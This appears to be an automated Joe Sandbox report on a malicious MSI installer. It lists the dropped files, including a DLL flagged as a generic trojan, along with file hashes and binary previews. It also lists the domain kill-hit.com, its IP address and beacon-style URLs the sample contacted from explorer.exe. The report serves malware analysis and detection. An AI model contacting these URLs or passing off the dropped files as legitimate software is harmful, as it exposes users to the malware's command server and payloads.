C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avcodec-60.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avformat-60.dll3%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avutil-58.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\msvcp140.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs.dll24%ReversingLabsWin64.Trojan.Generic
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swresample-4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swscale-7.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\utest.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140_1.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\w32-pthreads.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\zlib.dll0%ReversingLabs
C:\Windows\Installer\MSIE0DE.tmp0%ReversingLabs
C:\Windows\Installer\MSIE18B.tmp0%ReversingLabs
C:\Windows\Installer\MSIE1CA.tmp0%ReversingLabs
C:\Windows\Installer\MSIE1FA.tmp0%ReversingLabs
C:\Windows\Installer\MSIE249.tmp0%ReversingLabs
C:\Windows\Installer\MSIE289.tmp0%ReversingLabs
C:\Windows\Installer\MSIE336.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=0S0%Avira URL Cloudsafe
http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=00%Avira URL Cloudsafe
http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=02Z0%Avira URL Cloudsafe
http://kill-hit.com/Y0%Avira URL Cloudsafe
https://java.oracle.com/0%Avira URL Cloudsafe
http://kill-hit.com:80/front.php?a=yrJh28ExgsVYO0Y&id=00%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
kill-hit.com
104.21.37.86
truetrue
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.micK064a7Rfk7.msifalse
      		high
      https://github.com/google/googletest/utest.dll.2.drfalse
        		high
        http://kill-hit.com/Yexplorer.exe, 0000000B.00000002.2323519946.000000000076B000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=0Sexplorer.exe, 0000000B.00000002.2323519946.0000000000747000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://streams.videolan.org/upload/obs-ffmpeg-mux.exe, obs-ffmpeg-mux.exe, 00000007.00000002.2334570142.00007FFD93796000.00000002.00000001.01000000.00000009.sdmpfalse
          		high
          http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=0explorer.exe, 0000000B.00000002.2323519946.0000000000747000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.videolan.org/x264.htmlavcodec-60.dll.2.drfalse
            		high
            https://java.oracle.com/classes.jsa.2.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://dashif.org/guidelines/trickmodeobs-ffmpeg-mux.exe, obs-ffmpeg-mux.exe, 00000007.00000002.2316007345.00007FFD902DB000.00000002.00000001.01000000.0000000A.sdmpfalse
              		high
              http://kill-hit.com/front.php?a=yrJh28ExgsVYO0Y&id=02Zexplorer.exe, 0000000B.00000002.2323519946.000000000077F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://kill-hit.com:80/front.php?a=yrJh28ExgsVYO0Y&id=0explorer.exe, 0000000B.00000002.2323519946.000000000077F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://standards.iso.org/ittf/PubliclyAvailableStandards/MPEG-DASH_schema_files/DASH-MPD.xsdobs-ffmpeg-mux.exe, 00000007.00000002.2316007345.00007FFD902DB000.00000002.00000001.01000000.0000000A.sdmpfalse
                		high
                https://aka.ms/winui2/webview2download/Reload():K064a7Rfk7.msifalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  104.21.37.86
                  		kill-hit.comUnited States
                  		13335CLOUDFLARENETUStrue

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1591347
                  Start date and time:2025-01-14 22:26:14 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 52s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:K064a7Rfk7.msi
                  renamed because original name is a hash value
                  Original Sample Name:b582b290012af285192ffdecc87a30f3964dacb82e26025c558aa0f46f2ab6fe.msi
                  Detection:MAL
                  Classification:mal92.evad.winMSI@16/80@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 114
                  • Number of non-executed functions: 167
                  Cookbook Comments:
                  • Found application associated with file extension: .msi

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing disassembly code.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUShttp://monitor.linkwhat.com/tl4tl4726Qz107cK770xR10599lj360px17lb07468gl70015oV95328Kn41253VG39381FP5605427918==aru2826664Get hashmaliciousPhisherBrowse
                  • 104.22.8.215
                  https://gm.zonimathor.ru/qNd7Get hashmaliciousUnknownBrowse
                  • 104.21.48.1
                  logitix.pdfGet hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  XML-702.msiGet hashmaliciousAteraAgentBrowse
                  • 104.18.18.106
                  Default3.aspxGet hashmaliciousUnknownBrowse
                  • 104.21.83.41
                  EFT_Payment_Notification_Gheenirrigation.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  Document_31055.pdfGet hashmaliciousUnknownBrowse
                  • 104.17.25.14
                  https://drive.google.com/file/d/1TF-huc4s6nOnHpT977ywO8Fj-NERebnm/view?usp=sharing_eip&ts=6786926eGet hashmaliciousUnknownBrowse
                  • 1.1.1.1
                  https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                  • 104.26.12.205
                  https://u5fv5thbb.cc.rs6.net/tn.jsp?f=001afWrpwCCI2iWUYbszOdwR1t-F0r_p2RGqIn0ncIGJMjdaOM_jQztL2YPmQvt1RwZdAfxf04J-YjkHFOHZPykwyeYjQ4jxhrp3R9ukIwbkymQTpm5mx66BC8isp_B2wncmFDUfjjBx4d0YXiDu3Nc77CSIweAs2ttJcycn-zsNnmgSBgvzRxIsANxjwCYrOKv75WAuwEQwGhM_zCMclXjGqvRsMBSOB_zxaR0ec-_RI8dWprXwmKrbaxahswkhBPJ&c=iov1_LdPHvUx2ChSLIucZWqsBXy1GpnpLdHBEmuzLivt4j5stH_55g==&ch=I1Y8e9rJ4WxwWWgomI7efPIFsqm6CDFWFpV-o6w0qPgtUQs3xBpKiA==Get hashmaliciousUnknownBrowse
                  • 104.21.30.190

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSetup.msiGet hashmaliciousUnknownBrowse
                    setup.msiGet hashmaliciousUnknownBrowse
                      Setup.msiGet hashmaliciousUnknownBrowse
                        setup.msiGet hashmaliciousUnknownBrowse
                          u1XWB0BIju.msiGet hashmaliciousUnknownBrowse
                            setup.msiGet hashmaliciousUnknownBrowse
                              setup.msiGet hashmaliciousUnknownBrowse
                                Setup.msiGet hashmaliciousUnknownBrowse
                                  6a7e35.msiGet hashmaliciousUnknownBrowse
                                    setup.msiGet hashmaliciousUnknownBrowse
                                      C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\BCUninstaller.exeSetup.msiGet hashmaliciousUnknownBrowse
                                        setup.msiGet hashmaliciousUnknownBrowse
                                          Setup.msiGet hashmaliciousUnknownBrowse
                                            setup.msiGet hashmaliciousUnknownBrowse
                                              u1XWB0BIju.msiGet hashmaliciousUnknownBrowse
                                                setup.msiGet hashmaliciousUnknownBrowse
                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                      6a7e35.msiGet hashmaliciousUnknownBrowse
                                                        setup.msiGet hashmaliciousUnknownBrowse

                                                          Created / dropped Files

                                                          C:\Config.Msi\41d8f1.rbs

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19841
                                                          Entropy (8bit):5.827151717787757
                                                          Encrypted:false
                                                          SSDEEP:384:98hXp9t2jOow/iWY+xGffx5xNYV1+HRb0ohZUQiSvQsnrWWUuVgurbnwenws2sdX:98hXp9t2jOow/iWY+xGffx5xNYV1+HRT
                                                          MD5:DA13C81909D6D1EC2B8211108C551D52
                                                          SHA1:530770DFEC35B133904E2DF681C8F8D1BF12A7DE
                                                          SHA-256:9C3917DE782F25C1C8C97D04C55697CA59BB7EC52B7592BC183E9221278AE195
                                                          SHA-512:66368C506B5CE92827A7C06F2E881A3DDB4FD595A22FBFF4A20200CDDE5EDD43290780A62E9F2E4BB52586FF6FD105429542F28255B4C3A6FDB6984E4640933D
                                                          Malicious:false
                                                          Preview:...@IXOS.@.....@i..Z.@.....@.....@.....@.....@.....@......&.{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}..Joas App..K064a7Rfk7.msi.@.....@.....@.....@......icon_31.exe..&.{DA5E0F10-2101-4D17-9C89-A01D7F5CF622}.....@.....@.....@.....@.......@.....@.....@.......@......Joas App......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{F39C344E-A83E-4760-8DA8-F27602095B4F}&.{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}.@......&.{BC83E781-7DE2-47A8-97C3-2E6CC9BCAD82}&.{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}.@......&.{279C32E3-A00A-4513-9A8B-D3984A41A6FB}&.{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}.@......&.{B61B35E4-8BE1-4171-B69B-E2423CE9179F}&.{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}.@......&.{FDDB96EE-847D-4B25-85B1-65E662CF63A8}&.{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}.@......&.{9608D8ED-8EC6-4540-B232-4A823606F862}&.{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}.@......&.{17B6E8D6-C004-40DB-BB2D-125D7C1CC21E}&.{7C382357-94C2-4

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\BCUninstaller.exe

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):310928
                                                          Entropy (8bit):6.001677789306043
                                                          Encrypted:false
                                                          SSDEEP:3072:Zczkitvo4BpYN/6mBPry8TXROLdW5m4mURs9OOGC0kvxVCd7wANmSrvlPSIB0P+4:ZA4NCmBPry/N24OOjVxM7RNrrvEc0a
                                                          MD5:147B71C906F421AC77F534821F80A0C6
                                                          SHA1:3381128CA482A62333E20D0293FDA50DC5893323
                                                          SHA-256:7DCD48CEF4CC4C249F39A373A63BBA97C66F4D8AFDBE3BAB196FD452A58290B2
                                                          SHA-512:2FCD2127D9005D66431DD8C9BD5BC60A148D6F3DFE4B80B82672AFD0D148F308377A0C38D55CA58002E5380D412CE18BD0061CB3B12F4DAA90E0174144EA20C8
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                          • Filename: setup.msi, Detection: malicious, Browse
                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                          • Filename: setup.msi, Detection: malicious, Browse
                                                          • Filename: u1XWB0BIju.msi, Detection: malicious, Browse
                                                          • Filename: setup.msi, Detection: malicious, Browse
                                                          • Filename: setup.msi, Detection: malicious, Browse
                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                          • Filename: 6a7e35.msi, Detection: malicious, Browse
                                                          • Filename: setup.msi, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8.}|...|...|....../p....../v....../1...u.a.l....../u...|........./v....../}...Rich|...........PE..d...i..d..........".................`<.........@..........................................`.................................................t$...........S...`..@........(..............T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data........@......................@....pdata..@....`.......&..............@..@_RDATA...............<..............@..@.rsrc....S.......T...>..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):506008
                                                          Entropy (8bit):6.4284173495366845
                                                          Encrypted:false
                                                          SSDEEP:6144:yY8mmN3YWYGAj9JwXScp39ioIKzKVEKfr01//bbh3S62Wt3A3ksFqXqjh6AusDyn:yY8XiWYGAkXh3Qqia/zAot3A6AhezSpK
                                                          MD5:98CCD44353F7BC5BAD1BC6BA9AE0CD68
                                                          SHA1:76A4E5BF8D298800C886D29F85EE629E7726052D
                                                          SHA-256:E51021F6CB20EFBD2169F2A2DA10CE1ABCA58B4F5F30FBF4BAE931E4ECAAC99B
                                                          SHA-512:D6E8146A1055A59CBA5E2AAF47F6CB184ACDBE28E42EC3DAEBF1961A91CEC5904554D9D433EBF943DD3639C239EF11560FA49F00E1CFF02E11CD8D3506C4125F
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                          • Filename: setup.msi, Detection: malicious, Browse
                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                          • Filename: setup.msi, Detection: malicious, Browse
                                                          • Filename: u1XWB0BIju.msi, Detection: malicious, Browse
                                                          • Filename: setup.msi, Detection: malicious, Browse
                                                          • Filename: setup.msi, Detection: malicious, Browse
                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                          • Filename: 6a7e35.msi, Detection: malicious, Browse
                                                          • Filename: setup.msi, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.}............|.&.....|.$.J...|.%.....H}*.....H}./....H}./.....~P.....H}./.....~D.........z...F}./....F}(.....F}./....Rich............PE..d.....@f.........."....!.b.....................@.....................................'....`.................................................|...........H........4.......(......8...0I..T....................J..(....G..@............................................text....a.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....pdata...4.......6..................@..@_RDATA..\...........................@..@.rsrc...H...........................@..@.reloc..8...........................@..B................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12224
                                                          Entropy (8bit):6.596101286914553
                                                          Encrypted:false
                                                          SSDEEP:192:4nWYhWxWWFYg7VWQ4uWjXUtpwBqnajrmaaGJ:2WYhWvZqlQGJ
                                                          MD5:919E653868A3D9F0C9865941573025DF
                                                          SHA1:EFF2D4FF97E2B8D7ED0E456CB53B74199118A2E2
                                                          SHA-256:2AFBFA1D77969D0F4CEE4547870355498D5C1DA81D241E09556D0BD1D6230F8C
                                                          SHA-512:6AEC9D7767EB82EBC893EBD97D499DEBFF8DA130817B6BB4BCB5EB5DE1B074898F87DB4F6C48B50052D4F8A027B3A707CAD9D7ED5837A6DD9B53642B8A168932
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...Y.=i.........." .........................................................0......a.....`.........................................`...,............ ...................!..............T............................................................................rdata..P...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-2-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12224
                                                          Entropy (8bit):6.640081558424349
                                                          Encrypted:false
                                                          SSDEEP:192:iTWYhWyWWFYg7VWQ4uWq6Cu87ZqnajgnLSyu:sWYhWi1XHllk2yu
                                                          MD5:7676560D0E9BC1EE9502D2F920D2892F
                                                          SHA1:4A7A7A99900E41FF8A359CA85949ACD828DDB068
                                                          SHA-256:00942431C2D3193061C7F4DC340E8446BFDBF792A7489F60349299DFF689C2F9
                                                          SHA-512:F1E8DB9AD44CD1AA991B9ED0E000C58978EB60B3B7D9908B6EB78E8146E9E12590B0014FC4A97BC490FFE378C0BF59A6E02109BFD8A01C3B6D0D653A5B612D15
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....y1..........." .........................................................0...........`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-datetime-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11712
                                                          Entropy (8bit):6.6023398138369505
                                                          Encrypted:false
                                                          SSDEEP:192:5WYhWYWWFYg7VWQ4SWSS/njxceXqnajLJ35H:5WYhW4gjmAlnJpH
                                                          MD5:AC51E3459E8FCE2A646A6AD4A2E220B9
                                                          SHA1:60CF810B7AD8F460D0B8783CE5E5BBCD61C82F1A
                                                          SHA-256:77577F35D3A61217EA70F21398E178F8749455689DB52A2B35A85F9B54C79638
                                                          SHA-512:6239240D4F4FA64FC771370FB25A16269F91A59A81A99A6A021B8F57CA93D6BB3B3FCECC8DEDE0EF7914652A2C85D84D774F13A4143536A3F986487A776A2EAE
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d.....Ab.........." .........................................................0......d.....`.........................................`................ ...................!..............T............................................................................rdata..4...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-debug-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):6.614262942006268
                                                          Encrypted:false
                                                          SSDEEP:192:4WYhWFsWWFYg7VWQ4eWZzAR/BVrqnajcJH:4WYhWFMJRLlA5
                                                          MD5:B0E0678DDC403EFFC7CDC69AE6D641FB
                                                          SHA1:C1A4CE4DED47740D3518CD1FF9E9CE277D959335
                                                          SHA-256:45E48320ABE6E3C6079F3F6B84636920A367989A88F9BA6847F88C210D972CF1
                                                          SHA-512:2BADF761A0614D09A60D0ABB6289EBCBFA3BF69425640EB8494571AFD569C8695AE20130AAC0E1025E8739D76A9BFF2EFC9B4358B49EFE162B2773BE9C3E2AD4
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................0............`.........................................`................ ...................!..............T............................................................................rdata..@...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-errorhandling-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):6.654155040985372
                                                          Encrypted:false
                                                          SSDEEP:192:imxD3vEWYhWnWWFYg7VWQ4eWMOwNbDXbBqnaj0qJm8:iIEWYhWFpLbBlwqJm
                                                          MD5:94788729C9E7B9C888F4E323A27AB548
                                                          SHA1:B0BA0C4CF1D8B2B94532AA1880310F28E87756EC
                                                          SHA-256:ACCDD7455FB6D02FE298B987AD412E00D0B8E6F5FB10B52826367E7358AE1187
                                                          SHA-512:AB65495B1D0DD261F2669E04DC18A8DA8F837B9AC622FC69FDE271FF5E6AA958B1544EDD8988F017D3DD83454756812C927A7702B1ED71247E506530A11F21C6
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....:.[.........." .........................................................0......~.....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15304
                                                          Entropy (8bit):6.548897063441128
                                                          Encrypted:false
                                                          SSDEEP:192:+AuVYPvVX8rFTsRWYhWyWWFYg7VWQ4eWQBAW+JSdqnajeMoLR9au:TBPvVXLWYhWiBdlaLFAu
                                                          MD5:580D9EA2308FC2D2D2054A79EA63227C
                                                          SHA1:04B3F21CBBA6D59A61CD839AE3192EA111856F65
                                                          SHA-256:7CB0396229C3DA434482A5EF929D3A2C392791712242C9693F06BAA78948EF66
                                                          SHA-512:97C1D3F4F9ADD03F21C6B3517E1D88D1BF9A8733D7BDCA1AECBA9E238D58FF35780C4D865461CC7CD29E9480B3B3B60864ABB664DCDC6F691383D0B281C33369
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................@............`.........................................`................0...................!..............T............................................................................rdata..(...........................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-2-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11712
                                                          Entropy (8bit):6.622041192039296
                                                          Encrypted:false
                                                          SSDEEP:192:dzWYhW1sWWFYg7VWQ4yWL3sQlmqnajlD4h1N:BWYhW2e6l94h1N
                                                          MD5:35BC1F1C6FBCCEC7EB8819178EF67664
                                                          SHA1:BBCAD0148FF008E984A75937AADDF1EF6FDA5E0C
                                                          SHA-256:7A3C5167731238CF262F749AA46AB3BFB2AE1B22191B76E28E1D7499D28C24B7
